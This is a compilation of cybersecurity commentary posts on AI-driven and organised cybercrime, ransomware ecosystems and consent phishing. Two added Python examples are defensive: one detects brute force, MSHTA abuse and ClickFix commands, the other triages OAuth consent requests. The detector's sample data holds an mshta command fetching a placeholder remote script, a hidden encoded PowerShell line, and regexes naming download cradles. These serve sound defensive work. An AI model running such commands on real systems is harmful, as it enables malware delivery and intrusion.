UNODC: Emerging threats: The intersection of #criminal and #technological innovation in the use of automation and #artificial #intelligence in the cybercrime landscape of Southeast Asia

Cybercrime has rapidly evolved from isolated acts by individual hackers to large-scale operations orchestrated by organized criminal groups. In this transformation, automation has emerged as a critical enabler, allowing threat actors to scale their activities, target victims across borders, and replicate attacks with minimal manual input. In Southeast Asia, this shift is particularly visible, as the region has become a hotspot for cyber-enabled criminality where traditional forms of crime such as fraud, extortion, and trafficking in persons are increasingly facilitated by automated tools and digital infrastructure. These dynamics are now extending into the Pacific, where accelerated digital adoption, limited regulatory capacity, and emerging online financial ecosystems present new opportunities for exploitation. This expansion underscores how criminal networks are leveraging technological innovation to widen their geographic footprint and entrench illicit operations across both Southeast Asia and the Pacific.

The brief documents how AI-powered deepfakes, voice cloning and synthetic identities are increasingly exploited to perpetrate large-scale fraud, while automated tools are driving phishing, malware distribution and illicit financial flows. Scam compounds are integrating AI into their operations, combining multilingual chatbots, automated outreach and coerced labour to target victims worldwide. Bots are also being deployed to establish mule accounts, circumvent verification processes and channel illicit proceeds through cryptocurrency. The analysis underlines that the use of automation and AI is not limited to financial crime. Recent cases highlight the role of these technologies in online child sexual exploitation, sextortion, disinformation campaigns and identity fraud.

Such developments illustrate the accelerating convergence between organized crime and technological innovation, and the growing challenges facing law enforcement and regulators in the region. In addition to mapping emerging risks, the brief provides recommendations for Member States and partners. These include strengthening legal and regulatory frameworks, equipping enforcement agencies with advanced investigative tools, developing safeguards against the misuse of new technologies, and enhancing regional cooperation. The brief also emphasizes the importance of awareness-raising, digital literacy and resilience measures to reduce victimization and build public confidence in digital environments.
Understanding Cybercriminals' Evolving Tactics
Summary
Understanding cybercriminals' evolving tactics means recognizing how hackers are constantly shifting their methods by adopting new technologies like artificial intelligence, automating attacks, and even collaborating with nation-states. These changes make digital threats more sophisticated, harder to detect, and capable of targeting companies and individuals on a global scale.
- Monitor emerging threats: Stay updated on the latest attack trends such as AI-generated phishing, deepfakes, and hybrid attacks that blend financial theft with espionage to better protect your organization.
- Invest in resilience: Focus on building digital skills and awareness amongst your team while updating security plans to prepare for attacks that bypass traditional defenses.
- Revise security strategy: Shift your mindset from defending against lone hackers to addressing complex threats from organized groups and state-sponsored actors using advanced technology and global resources.
Over the past 5 years, cybersecurity has evolved a lot. Here's a breakdown of how the threat landscape has shifted, and yes, some of it is darkly amusing:

1. "Shift Left" As organizations adopt the "shift-left" security mindset, catching issues early in the development process, attackers are evolving too. They're not just watching from the sidelines; they're learning the playbook and staying one step ahead.

2. "The Decline of the Classics" Traditional vulnerabilities like SQL injection, DoS, MITM, and spoofing are no longer the headline acts. Design improvements have made them harder to exploit. But don't pop the champagne yet; new challenges are waiting in the wings.

3. "Logic, Leaks, and Loopholes" Business logic flaws, exposed PII, leaked secrets, supply chain compromises, and employee credential dumps are now the front line. These aren't just technical issues; they're strategic vulnerabilities. It's a reminder that while systems are secure by design, humans often aren't.

4. "Attackers Go Global, Detection Goes Local" With AI and compute power, attackers can distribute operations across countless IPs, regions, and resources. This makes detection and response, particularly in bot management and WAF contexts, a true headache. Imagine chasing a burglar who splits into a thousand tiny burglars, across time zones.

5. "AI-Powered Attacks" While guardrails are improving, attackers are pivoting to the weakest link: "PEOPLE". AI-powered social engineering campaigns are their new favorite tool. Who needs to hack a system when you can just convince someone to hand over the keys?

6. "Malware as a Service? Welcome to the Cyber SaaS Era" Malicious actors are embracing SaaS, leveraging legitimate platforms like Cloudflare to host their operations. Yes, they've gone corporate, and they're really good at collaboration. Aggregating and identifying their infrastructure as malicious has become a serious challenge.

Frankly, they'd make excellent startup founders, if only their "product" wasn't chaos. The game has changed, and so must our approach. Cybersecurity is no longer just about patching code or stopping an attack; it's about outthinking adversaries who are more resourceful, creative, and global than ever before. What trends have you noticed in the last few years? #securitytrends #cloudsecurity #cloud #AIsecurity #LLMs
🚨 Attackers Get Smarter: Brute-Force, Phishing, and Exploits Surge

ReliaQuest's latest threat intel shows attackers aren't slowing down; they're evolving. Between Dec 2024 and Feb 2025, brute-force attacks on VPNs, RDP, and VDI shot up 21.3%, with actors scanning the internet for weak points in your remote access.

💥 What's Heating Up:
- RDP access exploited: One customer's Windows Admin account was brute-forced via exposed RDP. The attacker dropped "System Informer" and went hunting with PsExec, caught just in time.
- MSHTA on the rise: Abuse of this native Windows binary jumped nearly 8%, driven by "ClearFake", a sneaky CAPTCHA scam that tricks users into running malicious code in Run prompts.
- Internal phishing gets an upgrade: PhaaS kits like "Sneaky 2FA" bypass MFA using adversary-in-the-middle tactics and fake Microsoft login pages.
- ClearFake's growing grip: The rise in ClickFix tactics is amplifying ClearFake's reach. This technique tricks users into pasting malicious commands into PowerShell or Run prompts, evading browser and antivirus defenses.
- Lumma steals the show: Expect more MaaS offerings like Lumma info-stealing malware to flood the dark web soon. ClearFake delivers Lumma using the copy-and-paste trick to bypass browser protections and steal sensitive data from victims.
- CL0P ransomware gang reigns supreme: After weaponizing a flaw in Cleo Harmony, CL0P wreaked havoc on the retail industry. Meanwhile, infighting in groups like Black Basta is pushing hacking gangs to start their own operations, shifting toward exfiltration-only attacks.

🎯 Why It Matters: Attackers are getting smarter, exploiting weak spots, and jumping on every opportunity to profit. Tactics like MSHTA abuse and exfiltration-only ransomware are on the rise, while access brokers are booming, with VPN listings surging 250% and prices up 46%. Cheaper exploits mean mass breaches are becoming more common. The threat is real, and it's growing.

🛡 Stay Proactive: Rely on Sigma rules from SOC Prime Platform to fortify your defenses against ever-adapting threats. All detection rules can be used across multiple SIEM, EDR, and Data Lake solutions and are mapped to MITRE ATT&CK®. Dive deep into full context with resources like CTI links, attack timelines, triage recommendations, and more actionable metadata.

❗️Disclaimer: The GIF is recorded with Uncoder AI, a private IDE & AI co-pilot for threat-informed detection engineering. Uncoder helps over 5000 people to enable fast IOC sweeps with automated IOC-based query generation, seamlessly convert Sigma rules into 44 SIEM, EDR, and Data Lake languages, or perform instant cross-platform translation across 11 language formats. Uncoder AI is also your powerful assistant for automated CTI enrichment, ATT&CK tagging, and rule verification.

References: Source: https://lnkd.in/dEKX9PBx Sigma Rules: https://lnkd.in/dQR2x5hb
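Three of the behaviours named in the post above (brute-force bursts against exposed remote access, MSHTA fetching a remote script, and a ClickFix one-liner pasted into the Run prompt) reduce to simple process and logon telemetry rules. The block below is an added example, not part of the post and not a SOC Prime or ReliaQuest rule: the event records are constructed, the thresholds are assumptions, and the regexes approximate what a Sigma rule for these techniques would match. It keys on the fact that anything typed into Win+R is spawned by explorer.exe.

```python
"""Toy detections for three patterns named in the post above: brute-force
bursts against exposed remote access, MSHTA launching remote scripts, and
ClickFix-style commands pasted into the Run prompt. Added example; the event
records below are constructed, not real telemetry."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows security events: (timestamp, event_id, source_ip, account).
# 4625 = failed logon, 4624 = successful logon.
LOGON_EVENTS = [
    (f"2025-01-10T09:{i // 6:02d}:{(i % 6) * 10:02d}", 4625, "203.0.113.7", "Administrator")
    for i in range(12)                      # 12 failures in under two minutes
] + [
    ("2025-01-10T09:00:05", 4625, "198.51.100.4", "jsmith"),   # a typo, not a burst
    ("2025-01-10T10:30:00", 4625, "198.51.100.4", "jsmith"),
    ("2025-01-10T09:03:00", 4624, "192.0.2.10", "jsmith"),
]

# Constructed process-creation events: (parent_image, image, command_line).
PROC_EVENTS = [
    # mshta pulling a remote script: the ClearFake/ClickFix pattern (URL is a placeholder)
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta https://example.invalid/ver.mp4"),
    # PowerShell pasted into Win+R: explorer.exe is the parent of anything run from the Run prompt
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),  # placeholder blob
    # benign admin use of PowerShell from the Run prompt: no hidden window, no encoded command
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -File C:\scripts\backup.ps1"),
    # mshta running a local .hta: out of scope for the remote-script rule
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta C:\Windows\Temp\setup.hta"),
]

# Thresholds are assumptions for the example; tune them to your environment.
BRUTE_FORCE_THRESHOLD = 10
BRUTE_FORCE_WINDOW = timedelta(minutes=5)


def find_bruteforce(events, threshold=BRUTE_FORCE_THRESHOLD, window=BRUTE_FORCE_WINDOW):
    """Return {source_ip: total_failures} for every IP that produced at least
    `threshold` failed logons (4625) inside any sliding `window`."""
    failures = defaultdict(list)
    for ts, event_id, ip, _account in events:
        if event_id == 4625:
            failures[ip].append(datetime.fromisoformat(ts))
    hits = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = len(times)
                break
    return hits


# mshta given a URL or inline script instead of a local .hta file
MSHTA_REMOTE = re.compile(r"mshta(\.exe)?\s+.*?(https?://|javascript:|vbscript:)", re.I)
# flags typical of a pasted ClickFix one-liner: hidden window, encoded command, download cradle
CLICKFIX_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biwr\b|\birm\b|invoke-webrequest|downloadstring)", re.I)


def classify_process(parent, image, cmdline):
    """Tag one process-creation event, or return None if it matches nothing."""
    image_l, parent_l = image.lower(), parent.lower()
    if image_l.endswith("mshta.exe") and MSHTA_REMOTE.search(cmdline):
        return "mshta_remote_script"
    if (image_l.endswith(("powershell.exe", "pwsh.exe"))
            and parent_l.endswith("explorer.exe")
            and CLICKFIX_FLAGS.search(cmdline)):
        return "clickfix_run_prompt"
    return None


def scan_processes(events):
    """Return [(image, tag)] for every event that triggers a rule."""
    hits = []
    for parent, image, cmdline in events:
        tag = classify_process(parent, image, cmdline)
        if tag:
            hits.append((image, tag))
    return hits


if __name__ == "__main__":
    print("brute force:", find_bruteforce(LOGON_EVENTS))
    for image, tag in scan_processes(PROC_EVENTS):
        print(f"{tag:<22} {image}")
```

The benign `-File` case and the local `.hta` case are there on purpose: both rules fire on the combination of parent, binary and argument shape, not on the binary alone, which is what keeps MSHTA and PowerShell rules from drowning in admin noise. A production rule would also cover cmd.exe as an intermediate parent and the RunMRU registry key that records what was typed into the Run prompt.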
Cybercriminals are now weaponizing AI to create more effective and scalable cyberattacks.

In the past, a phishing campaign required effort. Attackers had to:
1. Collect data: find victims' names and emails.
2. Write individualized messages: manually craft emails, often struggling with language and personalization.
3. Scale their attack: repeat this process for thousands of targets, making mass phishing time-consuming and inefficient.

Enter Generative AI. Now, cybercriminals can automate highly personalized spear-phishing campaigns at scale with flawless language, tailored messaging, and near-instant execution. Instead of struggling with individual emails, they can generate thousands of convincing, targeted attacks in seconds.

Why This Matters for Cybersecurity Leaders:
- Attacks are becoming more convincing: AI improves phishing email quality, making them harder to detect.
- Scalability is no longer a limitation: Threat actors can now launch thousands of highly personalized attacks at once.
- Organizations must step up defenses: Advanced email security, AI-driven threat detection, and continuous employee awareness are more critical than ever.

Generative AI isn't just changing how businesses operate, it's evolving the cyber threat landscape. Security teams must adapt just as quickly to stay ahead.
The line between cybercriminals and nation-state hackers has officially disappeared. And most logistics firms (or really most companies in general) have no idea what that means for them.

For most of my career, 20 years with the FBI and another six in the private sector, the rules were mostly clear. Cybercriminals wanted money. Nation-states wanted intelligence. Different motives. Different methods. Different targets. That world no longer exists.

What we're seeing now is a hybrid threat model that should alarm every executive regardless of your geographical location:
🔴 Nation-states are outsourcing operations to criminal groups and giving them state-level tools, zero-day exploits, and operational cover.
🔴 Criminal gangs are selling access to compromised networks to state-sponsored actors looking for geopolitical leverage.
🔴 Ransomware crews are doubling as espionage assets, extracting data for intelligence services BEFORE encrypting your systems for profit.

This isn't theory. This is happening right now. Groups linked to Russia, China, and North Korea are actively blending with cybercriminal ecosystems. The result? Attacks that carry the sophistication of a government operation with the ruthless financial motivation of organised crime.

Why should executives and senior leaders care? ("We've never had a breach, why should I care?!") Because you sit at the intersection of everything these hybrid actors want:
🟠 Real-time movement data across borders
🟠 Customs and trade documentation
🟠 Access to defence and critical infrastructure supply chains
🟠 Financial transaction flows between dozens of partners

Your network isn't just a business asset. It's an intelligence goldmine. And here's the problem: most companies are still defending against yesterday's threat. A lone hacker in a hoodie. A generic phishing email. A script kiddie poking at your firewall. The adversary has evolved. Your security posture has to evolve with it.

This hybrid model demands hybrid defence:
✅ Threat intelligence that goes beyond vendor dashboards, understanding WHO is targeting your sector and WHY
✅ Board-level awareness that treats cyber threats as geopolitical risks, not just IT tickets
✅ Supply chain vetting that accounts for state-sponsored infiltration, not just financial stability
✅ Incident response plans built for attacks that are designed to persist, not just disrupt

Because when a criminal gang has a nation-state standing behind it, your antivirus subscription isn't going to do much. Is your organisation still defending against yesterday's threat actor, or have you adapted to the hybrid reality? I'd like to hear how your industry is responding. Drop your perspective below or send me a message directly if you have questions or would like to discuss specific threats to your business. I'm just here to help.
We have spent the last decade teaching individuals to avoid clicking on suspicious links. Now, we face a new challenge: teaching them to be cautious about connections. This shift is significant.

Historically, the phishing playbook was straightforward: get someone to click a harmful link, open a malicious attachment, or share their credentials. However, the tactics are evolving. Instead of requesting a click, attackers may ask for seemingly reasonable actions:
- Connect this inbox assistant.
- Add this skill.
- Install this connector.
- Grant this tool access to your calendar, email, Slack, or CRM.

This evolution is what makes the current landscape feel different. The new lure is not fear; it's productivity. Attackers present software that appears helpful, promising speed, automation, and reduced manual work. While some of these tools may indeed deliver on their promises, normalizing the mindset of "just connect it" introduces a new trust issue. The next phishing campaign may not request your password; it may seek permissions.

From the perspective of security teams, particularly at IRONSCALES, this is where many may find themselves unprepared. The focus has primarily been on identifying suspicious messages, but we must shift our attention to suspicious access, connectors, and automation. Attackers can bypass your email security if they successfully convince someone to grant access to a tool that seems legitimate. This represents a fundamentally different kind of phishing problem.
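The practical consequence of the post above is that a consent prompt has to be triaged by what it asks for, not by how the message around it reads. The block below is an added example, not IRONSCALES code or anything from the post: it scores a "connect this tool" request by the delegated permissions requested, treats offline_access as the persistence multiplier it is (it yields a refresh token, so every other grant outlives the session), and refuses to ignore scopes it does not recognise. Scope names follow Microsoft Graph naming; the weights, verdict thresholds and sample requests are assumptions constructed for the example.

```python
"""Added example for the post above: triaging "connect this tool" consent
requests by the permissions they ask for, instead of by how the message
looks. Scope names follow Microsoft Graph naming; the weights, the verdict
thresholds and the sample requests are constructed for this example."""
from dataclasses import dataclass

# Delegated permissions grouped by what an attacker could do with them.
HIGH_RISK = {"Mail.ReadWrite", "Mail.Send", "Files.ReadWrite.All",
             "Directory.ReadWrite.All", "MailboxSettings.ReadWrite"}
MEDIUM_RISK = {"Mail.Read", "Files.Read.All", "Calendars.ReadWrite", "Contacts.Read"}
LOW_RISK = {"openid", "profile", "email", "User.Read", "Calendars.Read"}
# offline_access grants nothing by itself, but it issues a refresh token, so
# every other scope in the same grant becomes standing access.
PERSISTENCE_SCOPE = "offline_access"

WEIGHTS = {"high": 5, "medium": 2, "low": 0, "unknown": 3}   # assumed weights
REVIEW_AT, BLOCK_AT = 4, 12                                   # assumed thresholds
UNVERIFIED_PUBLISHER_PENALTY = 4                              # assumed


@dataclass
class ConsentRequest:
    app_name: str
    publisher_verified: bool
    scopes: list


def scope_tier(scope):
    """Classify one scope; anything not recognised is reviewed, not ignored."""
    if scope in HIGH_RISK:
        return "high"
    if scope in MEDIUM_RISK:
        return "medium"
    if scope in LOW_RISK:
        return "low"
    return "unknown"


def score_consent(req):
    """Return (verdict, score, reasons) for one consent request."""
    score, reasons = 0, []
    for scope in req.scopes:
        if scope == PERSISTENCE_SCOPE:
            continue
        tier = scope_tier(scope)
        score += WEIGHTS[tier]
        if tier != "low":
            reasons.append(f"{tier}-risk scope {scope}")
    # Persistence only matters if there is something worth persisting.
    if PERSISTENCE_SCOPE in req.scopes and score > 0:
        score *= 2
        reasons.append("offline_access turns the grant into standing access")
    if not req.publisher_verified:
        score += UNVERIFIED_PUBLISHER_PENALTY
        reasons.append("publisher not verified")
    if score >= BLOCK_AT:
        verdict = "block"
    elif score >= REVIEW_AT:
        verdict = "review"
    else:
        verdict = "allow"
    return verdict, score, reasons


def triage(requests):
    """Map app name -> verdict for a batch of consent requests."""
    return {r.app_name: score_consent(r)[0] for r in requests}


# Constructed sample requests; the app names are invented.
SAMPLE_REQUESTS = [
    ConsentRequest("Calendar Helper", True,
                   ["openid", "User.Read", "Calendars.Read", "offline_access"]),
    ConsentRequest("CRM Sync", True, ["User.Read", "Contacts.Read", "Mail.Read"]),
    ConsentRequest("Inbox Assistant", False,
                   ["User.Read", "Mail.ReadWrite", "Mail.Send", "offline_access"]),
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        verdict, score, reasons = score_consent(req)
        print(f"{req.app_name:<16} {verdict:<7} score={score:<3} {'; '.join(reasons)}")
```

The "Inbox Assistant" request is the one the post is warning about: read and send on the mailbox plus a refresh token, from a publisher nobody has vetted, is a mailbox takeover that never touched the password. The scoring is a triage aid; the control that actually stops the pattern is the tenant setting that routes user consent for unverified or high-privilege apps to an admin review queue instead of letting the user approve it inline.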
The Rise of Hacker Micro-Markets Cybercriminals are shifting tactics—rather than relying on large underground marketplaces, they’re creating micro-markets to sell stolen data directly. These hackers use multiple personas to promote their sites, leveraging social media tactics to attract buyers and build trust. Here's an actor sharing a free CashApp method on a scammer’s Telegram channel. The real goal? To advertise their logs platform, hackersworld[.]shop. By sharing hacking techniques and showcasing their 'expertise,' the scammer builds trust and credibility—ultimately driving traffic to their marketplace. This tactic mirrors legitimate marketing strategies, especially in social media, where value-driven content is used to attract and convert customers. The cybercrime landscape continues to evolve, adopting methods we see in everyday business. By analyzing the hackersworld website, we identified 66 different domains with similar themes, some dating back as far as five years. This highlights their persistence and long-term operation. IOCs: https://lnkd.in/ebgcGjPJ As cybercriminals adopt marketing strategies similar to legitimate businesses, how can we stay ahead of these threats? Let’s discuss. 🚨
In this blog, Microsoft details how attackers are leveraging phishing campaigns, malicious infrastructure, and social engineering to infiltrate higher education institutions. Once inside, they manipulate payroll processes to reroute direct deposits, steal credentials, and establish persistence for future fraud. The investigation highlights the attackers’ evolving tactics, including the use of lookalike domains, cloud-based tools, and multi-stage credential harvesting designed to evade traditional defenses. The post also outlines key detection strategies, recommended mitigations, and security best practices that universities and other organizations can adopt to defend against these financially motivated campaigns. This is a must-read for security leaders, IT administrators, and anyone responsible for safeguarding institutional finances and data. https://lnkd.in/eu43JHgP
🇷🇺 🗞️ How Russia selectively controls the impunity enjoyed by cybercriminals: an enlightening report issued this week by INSIKT Group / Recorded Future, documenting how the Russian cyber-criminal ecosystem shifted from broad tolerance to managed control.

🔎 Research from May 2024 to Sept 2025 using data from dark-web forums, leaked chats and public enforcement actions. It sheds light on Operation Endgame, a multinational takedown effort from May 2024, and shows how it changed ground dynamics:
🔹 It targeted loaders, enablers, money mules and infrastructure.
🔹 The actions signalled to the ecosystem that the cost-benefit calculus for operating from/within Russia has shifted; enforcement is not zero-risk.
🔹 The selective pressure triggered changes in the underground: fragmentation, tighter vetting, paranoia, evolving ransomware TTPs, group rivalries, payment/target strategies.
🔹 The "politics of protection": enforcement, or the lack of it, signals which actors are expendable and which are strategically useful.

Take-aways

1️⃣ A managed market
🔹 The 🇷🇺 cyber-criminal ecosystem has evolved from near-blanket tolerance toward selective State management: actors with little strategic value are targeted, those providing intelligence, geopolitical leverage and state utility are insulated.
🔹 Protection no longer depends on location.
🔹 Direct, task-level coordination between cyber-criminal leadership and Russian intelligence. In addition, the "Dark Covenant" model (direct, indirect, tacit links) remains operative.

2️⃣ Underground ecosystem adapts
🔹 Affiliates are less visible; open-call RaaS (ransomware-as-a-service) programs declined in public forums.
🔹 Operators have heightened vetting: deposits, KYC-lite checks, stricter inactivity rules.
🔹 Business rules: some ransomware programs explicitly exclude nonprofits, healthcare, government entities; minimum ransom demands; anti-collision rules. These act as both reputational hedges and political boundary markers.
🔹 Impersonator groups proliferate: façade ransomware groups or "scam" groups trying to ride brand equity, which erodes trust and raises barriers to entry.
🔹 Forum discussions show increased emphasis on OPSEC, moving to decentralized communication: burner phones, hidden volumes.

3️⃣ Enforcement signals / "politics of protection"
• Russian authorities have taken visible action against certain monetisation/enabler nodes (e.g., Cryptex, UAPS).
• By contrast, core high-value ransomware groups (Conti, Trickbot) have avoided this: insulation via state links.

4️⃣ Cyber-criminal groups are increasingly embedded in Russia's geopolitical strategy
🔹 Arrests, releases and negotiations align with diplomatic cycles and prisoner exchanges.
🔹 Cyber-crime is a hybrid instrument of state influence, intelligence gathering, plausible deniability and leverage.

➡️ Defenders should understand the state-criminal bargain.
🔹 Disruption strategies need to target the enablers too (cash-out, money laundering, hosting).

📰 ☕️ Enjoy the weekend read!
Navigating AI-Driven Cybercrime: What Every Business Needs to Know Here’s the deal: The rise of AI isn’t just transforming industries—it’s transforming cybercrime too. Staying secure in this new landscape means understanding just how AI is reshaping threats. Here are three critical insights to keep your business one step ahead: → AI is Empowering Cybercriminals From automated phishing to deepfake scams, cybercriminals are using AI to make their attacks faster, smarter, and more convincing. Traditional defenses alone won’t cut it. Staying informed about AI-driven threats is crucial. → Strengthen Your Cybersecurity Practices Don’t wait for an attack to hit. Implement robust measures—multi-factor authentication, regular updates, and AI-powered security tools that can detect suspicious activity in real time. Empower your employees with training to recognize phishing attempts and scams. → Use AI as a Defense Tool, Not Just a Threat AI can be your ally too. Leverage machine learning to spot patterns, monitor activity continuously, and respond automatically to threats. Shifting from a reactive to a proactive approach is key in today’s threat landscape. The takeaway? The AI-driven cyber threat landscape is here, and it’s only growing. Businesses that understand, prepare, and harness AI for defense will be best positioned to stay secure. Are you ready to strengthen your defenses? Let’s talk strategy.